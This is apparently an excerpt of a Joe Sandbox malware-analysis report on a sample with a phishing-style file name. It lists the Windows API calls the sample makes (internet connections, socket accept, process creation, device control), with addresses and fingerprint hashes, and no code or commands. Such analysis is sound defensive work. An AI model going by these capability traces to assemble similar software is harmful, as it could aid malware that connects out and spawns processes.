                            • API String ID: 2864067406-0
                            • Opcode ID: 860659a934f0bb40b6b6bbea3cb9ee0eb6df039b675b0da8206b83a4db750fa6
                            • Instruction ID: aa1be2550111479396e451b281fdbfb77d6d6b2b99af7985338752310d1396dc
                            • Opcode Fuzzy Hash: 860659a934f0bb40b6b6bbea3cb9ee0eb6df039b675b0da8206b83a4db750fa6
                            • Instruction Fuzzy Hash: C321EF35600058BFCB258F95DC98EFA7BF5EB4A710F044069F905A76A2C3319DA1DBA0
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D49B7
                              • Part of subcall function 000D4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000D4A60
                              • Part of subcall function 000D4A41: InternetCloseHandle.WININET(00000000), ref: 000D4AFD
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 06f8d57b7fb71654709729866119daf127adf5a38f1562b1277a174dd0ee6f97
                            • Instruction ID: ba866b27a036c16eec44417e08b7179123b13991beb71d0384001063319824e2
                            • Opcode Fuzzy Hash: 06f8d57b7fb71654709729866119daf127adf5a38f1562b1277a174dd0ee6f97
                            • Instruction Fuzzy Hash: 0321CF31240B05BFDB129FA49C05FBBBBA9FB48711F10401BFA4596751EBB1D810ABB5
                            APIs
                            • GetWindowLongW.USER32(?,000000EC), ref: 000E88A3
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E88BD
                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 000E88CB
                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 000E88D9
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$Long$AttributesLayered
                            • String ID:
                            • API String ID: 2169480361-0
                            • Opcode ID: b312d874175c1aa962df0f5c5226a4900a8394af368a99aed7b20f1aea12bf5b
                            • Instruction ID: 87dfa9e09f86d1f92ace2157f459f98478f6ad9f7c604d03f521bb80cf667ccc
                            • Opcode Fuzzy Hash: b312d874175c1aa962df0f5c5226a4900a8394af368a99aed7b20f1aea12bf5b
                            • Instruction Fuzzy Hash: D7117C31205514AFDB14AB69DC45FAA7BADBF85320F148119F95AD72E2CFB0AC40CBA1
                            APIs
                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 000D906D
                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 000D907F
                            • accept.WSOCK32(00000000,00000000,00000000), ref: 000D908C
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D90A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastacceptselect
                            • String ID:
                            • API String ID: 385091864-0
                            • Opcode ID: 9c43e333e8a9c207b5c5aea526bd9cc31f8b7a758a21a2d10b819d965600f9c8
                            • Instruction ID: 1d39cc5d251dd6b1dbad17be5c9433db66d7e1ce783227c269f094ba53085d1c
                            • Opcode Fuzzy Hash: 9c43e333e8a9c207b5c5aea526bd9cc31f8b7a758a21a2d10b819d965600f9c8
                            • Instruction Fuzzy Hash: 79215471900224AFCB11DF69D885ADEBBFCEF49710F01816AF849D7291D6749A81CBA0
                            APIs
                              • Part of subcall function 000C2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?), ref: 000C2CB9
                              • Part of subcall function 000C2CAA: lstrcpyW.KERNEL32(00000000,?,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C2CDF
                              • Part of subcall function 000C2CAA: lstrcmpiW.KERNEL32(00000000,?,000C18FD,?,?,?,000C26BC,00000000,000000EF,00000119,?,?), ref: 000C2D10
                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C1916
                            • lstrcpyW.KERNEL32(00000000,?,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C193C
                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,000C26BC,00000000,000000EF,00000119,?,?,00000000), ref: 000C1970
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: lstrcmpilstrcpylstrlen
                            • String ID: cdecl
                            • API String ID: 4031866154-3896280584
                            • Opcode ID: 9b9737baf5a92a832b1c61efb0c633dc03b105d5eddf5bc6c300497d3bd709ac
                            • Instruction ID: 03dbe15e0e9637b07bb0473ff3a33efcf6cccfb7875b2a1b2a09ee5c8408e8c7
                            • Opcode Fuzzy Hash: 9b9737baf5a92a832b1c61efb0c633dc03b105d5eddf5bc6c300497d3bd709ac
                            • Instruction Fuzzy Hash: 2B11BE36100305AFDB15AF74D855EBE77E8FF46350B40802EF846CB2A1EB71984187A1
                            APIs
                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 000C715C
                            • _memset.LIBCMT ref: 000C717D
                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 000C71CF
                            • CloseHandle.KERNEL32(00000000), ref: 000C71D8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseControlCreateDeviceFileHandle_memset
                            • String ID:
                            • API String ID: 1157408455-0
                            • Opcode ID: 6a060ed3b59e0ab69e3010ebb24070b754ad57b5263327943fe6ca6923c01737
                            • Instruction ID: b3f6d7405fea726a64441d5fd02a2cdc19990a6ec0db704cbbc59706ed63abdc
                            • Opcode Fuzzy Hash: 6a060ed3b59e0ab69e3010ebb24070b754ad57b5263327943fe6ca6923c01737
                            • Instruction Fuzzy Hash: 4611CA759012287AD7305BA9AC4DFEFBABCEF45760F14419AF908E71D0D6744E808BA4
                            APIs
                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 000C13EE
                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000C1409
                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000C141F
                            • FreeLibrary.KERNEL32(?), ref: 000C1474
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                            • String ID:
                            • API String ID: 3137044355-0
                            • Opcode ID: a9a035aeee592b951f1c3ea0aa320cfe298796ec564ef1c5864b0096f3dcdf98
                            • Instruction ID: 4f36d28faf6e41f1c0f9a2fafc265fa636dc3dffda3b56731500ca5b991424de
                            • Opcode Fuzzy Hash: a9a035aeee592b951f1c3ea0aa320cfe298796ec564ef1c5864b0096f3dcdf98
                            • Instruction Fuzzy Hash: B2219D71500209EBEB249F90DC88FDEBBB8EF02704F00846DA55297452DB74EA44CB50
                            APIs
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000CAEA5,?,?,00000000,00000008), ref: 0009F282
                              • Part of subcall function 0009F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,000CAEA5,?,?,00000000,00000008), ref: 0009F2A6
                            • gethostbyname.WSOCK32(?,?,?), ref: 000D92F0
                            • WSAGetLastError.WSOCK32(00000000), ref: 000D92FB
                            • _memmove.LIBCMT ref: 000D9328
                            • inet_ntoa.WSOCK32(?), ref: 000D9333
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                            • String ID:
                            • API String ID: 1504782959-0
                            • Opcode ID: 3b49309577e75651749783a10b8b782beeda69d08b734833bce9e728937eaca2
                            • Instruction ID: e9e292bf230cb2aaed1acb68824d1b805bd847c19963626b622949d6fa90857e
                            • Opcode Fuzzy Hash: 3b49309577e75651749783a10b8b782beeda69d08b734833bce9e728937eaca2
                            • Instruction Fuzzy Hash: 4E112B76A00109AFCB04FBA0DD56DEE77B9FF08315B144066F546A72A2DB30EE14DB61
                            APIs
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000BC285
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC297
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC2AD
                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000BC2C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID:
                            • API String ID: 3850602802-0
                            • Opcode ID: c5055a37feb7684183ef73bc5e8347130c0bd44e8fc878a932353c0b01dae73f
                            • Instruction ID: be1793287847385ac292871bddfe6753705572562fa9bb682251694584e5184e
                            • Opcode Fuzzy Hash: c5055a37feb7684183ef73bc5e8347130c0bd44e8fc878a932353c0b01dae73f
                            • Instruction Fuzzy Hash: 5211187A940218FFEB11DBD8C885EDDBBB4FB08710F2040A1EA05B7294D671AE10DB94
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 000C7C6C
                            • MessageBoxW.USER32(?,?,?,?), ref: 000C7C9F
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000C7CB5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000C7CBC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                            • String ID:
                            • API String ID: 2880819207-0
                            • Opcode ID: 0347f94a872c11e177a777970c511eddfd8703741f5c9732120dcfe70f9b74f6
                            • Instruction ID: bd2d57a41a509ae7882874a892fe6ea159ec1168e8663aa1aeeac7911d620b42
                            • Opcode Fuzzy Hash: 0347f94a872c11e177a777970c511eddfd8703741f5c9732120dcfe70f9b74f6
                            • Instruction Fuzzy Hash: 5F110876A04204ABC7129BACAC48FDE7FAD9B45324F144259F569D32A1D6B089848BA0
                            APIs
                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                            • GetStockObject.GDI32(00000011), ref: 0009C66B
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateMessageObjectSendStockWindow
                            • String ID:
                            • API String ID: 3970641297-0
                            • Opcode ID: b1ead1f0f9357b23ff55422cd79fd7ece05121f190d90f52db8023433faa055a
                            • Instruction ID: c5fcae9dcf721402daff6fb4288c5e2e9af4e0a1ed95713673f62f79913c71ed
                            • Opcode Fuzzy Hash: b1ead1f0f9357b23ff55422cd79fd7ece05121f190d90f52db8023433faa055a
                            • Instruction Fuzzy Hash: 5A118072901649BFEF128FA4DC54EEABBA9FF09364F054215FA5452160C772DCA0EBA0
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C49EE
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A13
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A1D
                            • Sleep.KERNEL32(?,?,?,?,?,?,?,000C354D,?,000C45D5,?,00008000), ref: 000C4A50
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuerySleep
                            • String ID:
                            • API String ID: 2875609808-0
                            • Opcode ID: 2a6798740aa3565b50551c27b1dbfabecc55dfdb720dc080f9023a6a269ea9e3
                            • Instruction ID: 4ad3da671132176b0bd3e2f93b57120508277aa3d4d2e9831aef1f439dcee804
                            • Opcode Fuzzy Hash: 2a6798740aa3565b50551c27b1dbfabecc55dfdb720dc080f9023a6a269ea9e3
                            • Instruction Fuzzy Hash: BB113C71D40528DBCF00EFE5E959BEEBB74FF08751F015059E941B2150CB709990CB9A
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                            • String ID:
                            • API String ID: 3016257755-0
                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                            • Instruction ID: 0e3ce694fb053b6693828b434c59e3547fde07335633d85a3df1b2cf1de02d13
                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                            • Instruction Fuzzy Hash: B101363240064EBBCF525E88DC41DEE7FA2BB18351F588855FA1859022D337CAB2AB81
                            APIs
                              • Part of subcall function 000A869D: __getptd_noexit.LIBCMT ref: 000A869E
                            • __lock.LIBCMT ref: 000A811F
                            • InterlockedDecrement.KERNEL32(?), ref: 000A813C
                            • _free.LIBCMT ref: 000A814F
                            • InterlockedIncrement.KERNEL32(00A268A8), ref: 000A8167
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 2704283638-0
                            • Opcode ID: 1904226c44ea90258a05d648db6bb27675469b46ccb8b09970b279edf945186b
                            • Instruction ID: e1cb2c4d42b57986fc087668a599c7df04a07779850818f6d0664e32bbba48a3
                            • Opcode Fuzzy Hash: 1904226c44ea90258a05d648db6bb27675469b46ccb8b09970b279edf945186b
                            • Instruction Fuzzy Hash: 3601D2319016119BCB55AFE4980A7ED77A4BF06714F048518F454A7692CF345C82CFD2
                            APIs
                            • __lock.LIBCMT ref: 000A8768
                              • Part of subcall function 000A8984: __mtinitlocknum.LIBCMT ref: 000A8996
                              • Part of subcall function 000A8984: EnterCriticalSection.KERNEL32(000A0127,?,000A876D,0000000D), ref: 000A89AF
                            • InterlockedIncrement.KERNEL32(DC840F00), ref: 000A8775
                            • __lock.LIBCMT ref: 000A8789
                            • ___addlocaleref.LIBCMT ref: 000A87A7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                            • String ID:
                            • API String ID: 1687444384-0
                            • Opcode ID: 8db8a4d20f62c03c10ed9214ebe7a9a92437c6ab3e66432b37ebc3825621bb17
                            • Instruction ID: 508f384b2529a0c96a448a7aedc9a03a437107e46f18cecfedebe26271706bd8
                            • Opcode Fuzzy Hash: 8db8a4d20f62c03c10ed9214ebe7a9a92437c6ab3e66432b37ebc3825621bb17
                            • Instruction Fuzzy Hash: 7D012D72405B00AFD760EFB5D90679AF7E0FF55725F20C90EE499976A2DBB0A640CB01
                            APIs
                            • _memset.LIBCMT ref: 000EE14D
                            • _memset.LIBCMT ref: 000EE15C
                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00143EE0,00143F24), ref: 000EE18B
                            • CloseHandle.KERNEL32 ref: 000EE19D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memset$CloseCreateHandleProcess
                            • String ID:
                            • API String ID: 3277943733-0
                            • Opcode ID: 8b2d009d7feae80c854485525a78cef1d1f01d7208f32a07cc44e6833775c5ec
                            • Instruction ID: f1a77a072db53bbfd2c4392f6a6e4e00d57366ff0b515c1d49986fcd5ee8ddfa
                            • Opcode Fuzzy Hash: 8b2d009d7feae80c854485525a78cef1d1f01d7208f32a07cc44e6833775c5ec
                            • Instruction Fuzzy Hash: 2FF082F5941314BFF2105BA5AC06FB77AACDB0B3A4F000420BE18E55B2D7B68E8086B5
                            APIs
                            • EnterCriticalSection.KERNEL32(?), ref: 000C9C7F
                              • Part of subcall function 000CAD14: _memset.LIBCMT ref: 000CAD49
                            • _memmove.LIBCMT ref: 000C9CA2
                            • _memset.LIBCMT ref: 000C9CAF
                            • LeaveCriticalSection.KERNEL32(?), ref: 000C9CBF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CriticalSection_memset$EnterLeave_memmove
                            • String ID:
                            • API String ID: 48991266-0
                            • Opcode ID: 90694555cd2fb738f7e45d695565564fd7ffcf21dcebeecf4ce8f42957916a0f
                            • Instruction ID: 08b5cfdd580db023cf840d9a7faafa9f70c29b0bd895c8461d663e2f51ae3fde
                            • Opcode Fuzzy Hash: 90694555cd2fb738f7e45d695565564fd7ffcf21dcebeecf4ce8f42957916a0f
                            • Instruction Fuzzy Hash: F6F05E7A201004ABCF016F94EC85E9ABB29EF45321F08C065FE099E217CB71E811DBB5
                            APIs
                              • Part of subcall function 0009B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0009B5EB
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B5FA
                              • Part of subcall function 0009B58B: BeginPath.GDI32(?), ref: 0009B611
                              • Part of subcall function 0009B58B: SelectObject.GDI32(?,00000000), ref: 0009B63B
                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 000EE860
                            • LineTo.GDI32(00000000,?,?), ref: 000EE86D
                            • EndPath.GDI32(00000000), ref: 000EE87D
                            • StrokePath.GDI32(00000000), ref: 000EE88B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                            • String ID:
                            • API String ID: 1539411459-0
                            • Opcode ID: 8464d705bde2a99992c94b2047b7822d29dd4263b35a8f6aa174f69d2f936edb
                            • Instruction ID: 200ee405f9cfbd7cd86450c595bbf91da5ded8d1b1398bb1235628fc1c396945
                            • Opcode Fuzzy Hash: 8464d705bde2a99992c94b2047b7822d29dd4263b35a8f6aa174f69d2f936edb
